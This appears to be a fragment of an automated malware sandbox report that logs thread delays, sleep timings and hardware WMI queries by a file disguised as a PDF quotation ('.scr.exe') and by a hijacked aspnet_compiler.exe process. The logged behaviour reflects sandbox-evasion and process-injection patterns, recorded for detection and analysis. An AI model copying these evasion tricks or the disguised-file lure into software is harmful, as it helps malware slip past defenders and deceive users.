                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794204Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeWindow / User API: threadDelayed 2163Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeWindow / User API: threadDelayed 7690Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 1710Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 8123Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -599765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -599649s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -599437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -599326s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -599218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -599108s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -599000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -598890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -598781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -598672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -598562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -598453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -598343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -598234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -598125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -598015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -597905s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -597797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -597687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -597577s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -597468s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -597359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -597244s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -597140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -597031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -596915s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -596812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -596703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -596593s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -596484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -596375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -596265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -596156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -596047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -595937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -595828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -595718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -595609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -595487s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -595375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -595265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -595156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -595047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -594937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -594780s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -594663s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe TID: 1892Thread sleep time: -594562s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1800000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7788Thread sleep count: 1710 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1799875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7788Thread sleep count: 8123 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1799766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1799657s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1799532s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1799407s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1799297s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1799188s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1799063s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1798938s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1798813s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1798688s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1798578s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1798468s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1798357s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1798250s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1798141s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1798016s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1797906s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1797797s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1797688s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1797563s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1797438s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1797325s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1797219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1797094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1796981s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1796875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1796766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1796657s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1796532s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1796407s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1796282s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1796172s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1796063s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1795938s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1795809s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1795704s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1795579s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1795454s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1795329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1795204s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1795079s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1794954s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1794829s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1794704s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1794579s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1794454s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1794329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7780Thread sleep time: -1794204s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599765Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599649Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599326Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599218Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599108Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598890Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598781Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598672Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598562Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598453Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598343Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598234Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598125Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 598015Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597905Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597797Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597687Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597577Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597468Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597359Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597244Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597140Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 597031Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596915Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596812Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596703Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596593Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596484Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596375Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596265Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596156Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 596047Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595937Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595828Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595718Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595609Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595487Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595375Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595265Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595156Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 595047Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 594937Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 594780Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 594663Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeThread delayed: delay time: 594562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1800000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799657Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799297Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1799063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798468Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798357Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798141Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1798016Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797906Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797797Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797325Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1797094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796981Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796657Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796407Jump to behavior
